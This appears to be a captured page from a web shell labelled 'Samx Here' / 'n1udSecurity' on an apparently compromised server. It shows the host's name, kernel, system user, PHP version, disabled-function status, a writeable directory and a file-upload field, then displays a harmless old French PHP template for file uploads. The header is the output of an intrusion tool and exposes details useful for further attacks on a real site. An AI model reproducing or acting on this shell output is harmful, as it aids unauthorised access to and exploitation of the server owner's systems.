Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/aftrn/banque_HS/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/aftrn/banque_HS/formenv.php
<?php
/***************************************************************************
 *
 *   date                 : Septembre 2002
 *   copyright            : (c) 2002 B&eacute;atrice Arnou
 *   email                : bea@cartables.net
 *
 *   Tout usage de ces scripts doit faire l'objet d'une demande d'autorisation 
 *   et ces mentions ne doivent pas &ecirc;tre retir&eacute;es ou modifi&eacute;es.
 *
 ***************************************************************************/

if ( !defined('IN_AFT') )
{
	die("Allons bon... Vous ne devriez pas &ecirc;tre l&agrave; !!!!");
}
?>
<table border=0 cellspacing=0 cellpadding=0 width=100%>
<tr>
<td colspan=2 width=100% bgcolor="<?php print ROUGE ?>" height="1">
  <img src="images/blank.gif" width="100%" height="1"><br>
</td>
</tr>
<tr>
<td width=50% valign="top" bgcolor="<?php print JAUNE ?>" align="center">
   <a href="f_upload.php">Envoyer&nbsp;un&nbsp;fichier</a>
   <br><span class="petit">(qui sera stock&eacute; sur ce site)</span>
</td>
<td width=50% valign="top" bgcolor="<?php print JAUNE ?>" align="center">
   <a href="l_upload.php">R&eacute;f&eacute;rencer&nbsp;un&nbsp;fichier&nbsp;externe</a>
   <br /><span class="petit">(stock&eacute; sur un autre site)</span>
</td>
</tr>
</table>

SAMX